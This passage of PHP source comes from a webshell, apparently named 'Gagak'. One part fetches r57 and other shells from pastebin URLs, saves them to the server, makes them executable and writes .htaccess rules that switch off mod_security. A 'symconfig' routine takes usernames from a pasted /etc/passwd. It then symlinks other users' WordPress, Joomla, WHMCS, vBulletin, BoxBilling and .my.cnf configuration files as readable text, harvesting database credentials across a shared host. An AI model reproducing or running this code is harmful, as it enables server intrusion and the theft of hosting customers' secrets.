  719.     $tools6_script = file_get_contents("http://pastebin.com/raw.php?i=G2VEDunW");
  720.     $tools6 = fopen($file_tools6, "w");
  721.     fwrite($tools6, $tools6_script);
  722.     fwrite($httools6, $isi_httools6);
  723.     chmod($file_tools6, 0755);
  724.     echo "Done <a href='Gagak_tools/r57.php'>R57 Shell Here</a>";
  725. }
  726. elseif($_GET['shell'] == 'noname'){
  727.     $tools7_dir = mkdir('Gagak_tools', 0755);
  728.     $file_tools7 = "Gagak_tools/noname.php";
  729.     $isi_httools7 = "<IfModule mod_security.c>
  730. SecFilterEngine Off
  731. SecFilterScanPOST Off
  732. </IfModule>";
  733.     $httools7 = fopen(".htaccess", "w");
  734.     $tools7_script = file_get_contents("http://pastebin.com/raw.php?i=BRCmf02c");
  735.     $tools7 = fopen($file_tools7, "w");
  736.     fwrite($tools7, $tools7_script);
  737.     fwrite($httools7, $isi_httools7);
  738.     chmod($file_tools7, 0755);
  739.     echo "Done <a href='Gagak_tools/noname.php'>Noname Shell Here</a>";
  740. }
  741. elseif($_GET['GagakPutih'] == 'symconfig') {
  742. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  743. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  744. exit;
  745. }
  746. else
  747. {
  748. if($_POST["m"] && !$_POST["passwd"]==""){
  749. @mkdir("Gagak_symconf", 0777);
  750. @chdir("Gagak_symconf");
  751. @symlink("/","root");
  752. $htaccess="Options Indexes FollowSymLinks
  753. DirectoryIndex c7eisjustice.htm
  754. AddType text/plain .php
  755. AddHandler text/plain .php
  756. Satisfy Any";
  757. @file_put_contents(".htaccess",$htaccess);
  758. $etc_passwd=$_POST["passwd"];
  759. $etc_passwd=explode("\n",$etc_passwd);
  760. foreach($etc_passwd as $passwd){
  761. $pawd=explode(":",$passwd);
  762. $user =$pawd[0];
  763.  
  764. @symlink('/','Gagak_symconf/root');
  765. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  766. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  767. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  768. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  769. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  770. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  771. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  772. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  773. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  774. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  775. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  776. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  777. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  778. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  779. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  780. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  781. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  782. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  783. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  784. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  785. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  786. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  787. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  788. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  789. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  790. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  791. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  792. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  793. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  794. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  795. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  796. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  797. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  798. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  799. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  800. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  801. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  802. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  803. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  804. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  805. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  806. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  807. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  808. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  809. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  810. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  811. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  812. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  813. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  814. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  815. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  816. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  817. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  818. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  819. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  820. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  821. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  860. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  861. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  862. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  863. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  864. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  865. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  866. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  867. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  868. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  869. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  870. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  871. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  872. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  873. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  874. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  875. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  876. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  877. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  878. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  879. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  880. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  881. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  882. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  883. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  884. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  885. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  886. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  887. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  898. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  899. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  900. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  901. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  902. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  903. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  904. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  905. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  906. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  907. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  908. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  909. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  910. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  911. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  912. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  913. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  914. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  915. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  916. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  917. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  918. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  919. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  920. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  921. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  922. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  923. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  924. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  925. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  926. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  927. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  928. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  929. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  930. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  931. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  932. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  933. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  934. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  935. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  936. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  937. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  938. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  939. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  940. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  941. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  942. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  943. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  944. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  945. @symlink('/home/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  946. @symlink('/home/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  947.  
  948. //Home1
  949.  
  950. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  951. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  952. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  953. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  954. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  955. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  956. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  957. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  958. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  959. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  960. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  961. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  962. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  963. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  964. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  965. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  966. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  967. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  968. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  969. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  970. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  971. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  972. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  973. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  974. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  976. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  977. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  978. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  979. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  980. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  981. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  982. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  983. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  984. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  985. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  986. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  987. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  988. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  989. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  990. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  991. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  992. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  993. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  994. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  995. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  996. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  997. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  998. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  999. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1000. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1060. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
